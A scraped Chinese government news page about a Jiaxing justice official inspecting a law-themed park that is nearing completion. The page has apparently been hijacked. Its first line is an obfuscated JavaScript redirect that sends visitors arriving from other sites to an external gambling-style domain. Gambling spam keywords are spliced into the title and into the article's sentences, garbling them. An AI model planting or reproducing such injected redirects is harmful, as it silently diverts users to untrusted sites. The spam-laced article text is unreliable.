var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

bbin宝盈,bbin下载

您的当前位置:首页 > bbin宝盈,bbin下载:
发布日期:2019-10-28 浏览次数: 字号:[ ]

10月28日,bbin宝盈,bbin下载:司法局副局长陈建新、嘉兴国际商务区投资建设有限公司董事长蒋海波一行前往经开区对即将竣工的府南(法治)公园进行了调研指导。

调研中,陈建新副局长对项目的设计规划和进展情况表示肯定,并从花木景观、雕塑造型、照明设置和氛围布置等方面,对现场工作人员进行指导。他指出,这座法治公园是市本级首个以法治建设为主题的独具特色的公园,在这次规划建设中各方都下足了功夫、动足了脑筋,整个公园具有较强的艺术性和观赏性,希望在下一步的收尾工作中,我们三方继续精益求精,高标准、严要求完成项目建设,力争建成全省乃至全国领先的地市级法治文化公园2.0 版(升级版)。

嘉兴法治文化(府南)公园是bbin宝盈,bbin下载:首家市本级法治文化公园,由市司法局、嘉兴经开区和嘉兴国际商务区投资公司公园联合改造建设,于今年5月中旬开工建设。目前,主体雕塑和基础工程顺利完工。公园占地37549平方米,以法安天下、盛世嘉年、法治护航、立国兴邦为主题,规划设计共分宪法开篇、法治溯源、先贤执法、地方法治、三治融合等十大板块,通过主题雕塑、景观小品、艺术场景等多种表现形式,力求达到群众“在游览中学法,与静坐中悟法”的目的,同时也展现了具有嘉兴特色的法治文化,是bbin宝盈,bbin下载:推进“七五”法治宣传教育规划的重要成果。





市局普法与依法治理处

 




打印本页 关闭窗口
Produced By 大汉网络 大汉版通发布系统